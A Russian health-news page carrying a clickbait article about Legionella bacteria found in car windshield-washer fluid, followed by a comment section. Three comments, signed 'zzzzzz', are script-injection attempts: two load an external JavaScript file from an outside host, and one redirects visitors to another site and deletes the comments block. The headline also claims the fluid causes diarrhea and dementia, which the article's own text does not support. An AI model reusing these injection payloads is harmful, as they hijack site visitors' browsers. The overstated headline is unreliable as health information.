Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Страшный повод ездить в г...  >>  Страшный повод ездить в грязной машине! Сможете избежать поноса, пневмонии и слабоумия!
 
Обратная связь
 

Страшный повод ездить в грязной машине! Сможете избежать поноса, пневмонии и слабоумия!

Размер шрифта
18 февраля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Омыватель автомобильных стекол вызывает пневмонию, понос и слабоумие! Именно в нем живет бактерия, которая вызывает болезнь легионеров.

Страшный повод ездить в грязной машине! Сможете избежать поноса, пневмонии и слабоумия!

Легионеллы были найдены в 75% образцов стеклоочистителя, взятого из школьных автобусов в Аризоне, где и проводилось исследование.

«При распылении омывателя стекол в воздух может попасть огромное количество этих бактерий. Поэтому мы считаем, что автомобили следует рассматривать как один из источников инфекции», – рассказывает Отто Швейк из Университета Аризоны, автор исследования.

Легионеллы в норме обитают в водной среде. Эти бактерии не передаются напрямую от человека к человеку. Известными источниками инфекции являются кондиционеры и джакузи. Большинство людей устойчивы к легионеллам, однако у некоторых эти бактерии могут вызвать тяжелую пневмонию – болезнь легионеров. Еще один вариант развития заболевания – лихорадка Понтиак, которая протекает без пневмонии и напоминает грипп.

Швейк с коллегами смогли установить, что в жидкости для омывания стекол количество бактерий со временем возрастало, и они могли оставаться жизнеспособными более 14 месяцев. Также был проведен анализ омывателя стекол в школьных автобусах Аризоны: легионеллы были обнаружены в 75% образцов.

Проект Швейка был начат после проведения ряда эпидемиологических исследований, которые показали, что автомобили могут быть возможным источником инфекции. По результатам одной из таких работ в 20% случаев заболевания легионеллезом в Великобритании источником инфекции послужила жидкость для омывания стекол.

«Мы впервые смогли показать, что автомобили являются важным фактором в распространении этого тяжелого заболевания», – говорит Швейк. «Наше исследование еще раз подтверждает тот факт, что на данный момент мы знаем далеко не о всех способах передачи инфекционных заболеваний, поэтому стоит быть бдительными».

Страшные болезни подстерегают нас за каждый углом! Узнайте, как не заболеть в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:18

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Можно ли сэкономить на воде и не ходить в душ?   Микробы в самолетах могут жить неделями! А сколько проживете вы после этой встречи?   Как не стать жертвой голубей-убийц?!   Одна привычка, которая делает вас больным  
28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых 28 марта 2013Язва желудка защищает от инфаркта и рака
 
18 февраля 2013Люди с повышенным внутриглазным давлением чаще разбиваются на машинах 17 января 2013Старческого маразма больше нет! Изобретена вакцина против болезни Альцгеймера!
 

Слайдшоу

1
5 мест, где вы точно подцепите простуду!
Как действительно избавиться от всех микробов. Часть 1
Эрозия зубной эмали

Тесты

Средства личной гигиены
Возраст мозга
Что вы знаете о пневмонии?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.